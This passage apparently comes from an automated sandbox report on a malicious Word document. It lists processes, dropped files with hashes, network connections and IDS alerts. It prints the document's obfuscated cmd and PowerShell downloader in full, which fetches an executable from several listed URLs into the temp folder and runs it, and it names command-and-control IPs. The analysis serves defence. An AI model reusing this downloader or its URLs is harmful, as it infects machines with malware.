4;79;11;2;69;78;50;79;16;16;69;9;3;48;79;79;50;41;21;2;21;69;54;54;16;69;9;3;48;59;11;22;79;2;69;68;22;54;50;42;69;9;3;28;59;79;50;2;3;1;39;10;33;78;1;57;45;60;69;55;69;60;3;48;79;79;50;41;60;69;30;1;58;1;69;9;72;63;7;1;68;43;70;13;3;43;16;79;50;42;21;37;39;21;3;37;54;59;54;79;51;25;78;7;18;25;3;10;54;24;24;50;30;38;63;29;39;66;63;68;28;62;37;66;1;13;3;43;16;79;50;42;34;21;3;28;59;79;50;51;9;3;15;22;42;50;42;2;69;15;16;50;50;59;69;9;47;72;21;13;13;64;1;78;8;47;78;1;57;21;3;28;59;79;50;51;30;66;1;39;76;78;70;21;8;76;1;21;42;11;11;11;11;51;21;25;47;39;10;63;15;1;8;47;78;1;57;21;3;28;59;79;50;9;3;27;22;50;79;24;2;69;63;22;22;22;50;69;9;4;7;1;68;15;9;5;5;43;68;78;43;70;25;5;5;3;27;16;24;79;41;2;69;7;16;41;16;59;69;9;86)do set 8p7h=!8p7h!!3x:~%x,1!&&if %x==86 echo !8p7h:~6!|FOR /F "delims=fA tokens=1" %v IN ('ftype^^^|find "dfil"')DO %v " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2260 | C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $q2408='h9408';$v2775=new-object Net.WebClient;$i2123='http://durosfarm.com/lMQ9kTo2tA3mYFA_oiMgkWg7@http://find-me-an-english-penpal.find-me-an-english-tutor.co.uk/NQI8cCjpRB_qU@http://sarwa.co.za/KuPva1H8nR7WkoQ@http://3kiloafvallen.nl/X69XdvjZ5jBYL_QaTDlZM@http://www.tuneldeviento.es/efkhzi4/wAGCn2Hj6mEWaks'.Split('@');$o5230='t5399';$u3358 = '229';$u1063='a6254';$d135=$env:temp+'\'+$u3358+'.exe';foreach($c9354 in $i2123){try{$v2775.DownloadFile($c9354, $d135);$k6454='k9551';If ((Get-Item $d135).length -ge 40000) {Invoke-Item $d135;$s6537='o6665';break;}}catch{}}$s9738='r9891';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2360 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=fA tokens=1" %v IN ('ftype^|find "dfil"') DO %v " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2796 | C:\Windows\system32\cmd.exe /c ftype|find "dfil" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3020 | C:\Windows\system32\cmd.exe /S /D /c" ftype" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3112 | find "dfil" | C:\Windows\system32\find.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (grep) Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3804 | cmd | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2672 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVREA93.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2672 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\40A705C3.jpg | — | |
MD5:— | SHA256:— | |||
4072 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1ECTZ9ELPGYCOAITA1FN.temp | — | |
MD5:— | SHA256:— | |||
2672 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$les-Invoice.xml | pgc | |
MD5:99E051533F51AE11EAFC2F62C7E3CB17 | SHA256:A7E81903F3C01D299B4B33B6E3FC874E7FA4AC722A5E9E1A425088F6B91379A7 | |||
4072 | powershell.exe | C:\Users\admin\AppData\Local\Temp\229.exe | executable | |
MD5:C9DDE1F9FC3CD405A9B8A2825B714474 | SHA256:03085000BD167C4B39F930138115F4A80159CD98E30E8B8C42C6CA8ECA7F6BEE | |||
2672 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:CFDFD5601AC28A032639CE3B74E33DEC | SHA256:CFCBA30F388F7D8C809B3DC547D2989276AC30681A40467C4BB66D0B6461484A | |||
2820 | 229.exe | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | executable | |
MD5:C9DDE1F9FC3CD405A9B8A2825B714474 | SHA256:03085000BD167C4B39F930138115F4A80159CD98E30E8B8C42C6CA8ECA7F6BEE | |||
4072 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
2672 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:51841B3D88B50BFD73A91594DDA18C62 | SHA256:F7F45BAFD351A1E8BB642D6A8C100AC81042F4B7BB57C5D9F08083C2A55AFE9E | |||
4072 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20fdbd.TMP | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4072 | powershell.exe | GET | 301 | 23.111.137.161:80 | http://durosfarm.com/lMQ9kTo2tA3mYFA_oiMgkWg7 | US | html | 254 b | suspicious |
3304 | wabmetagen.exe | GET | — | 206.248.110.184:8080 | http://206.248.110.184:8080/ | PR | — | — | malicious |
4072 | powershell.exe | GET | 200 | 23.111.137.161:80 | http://durosfarm.com/lMQ9kTo2tA3mYFA_oiMgkWg7/ | US | executable | 600 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3304 | wabmetagen.exe | 182.180.170.72:22 | — | Pakistan Telecom Company Limited | PK | suspicious |
3304 | wabmetagen.exe | 206.248.110.184:8080 | — | — | PR | malicious |
4072 | powershell.exe | 23.111.137.161:80 | durosfarm.com | HIVELOCITY VENTURES CORP | US | suspicious |
Domain | IP | Reputation |
---|---|---|
durosfarm.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
4072 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
4072 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
4072 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |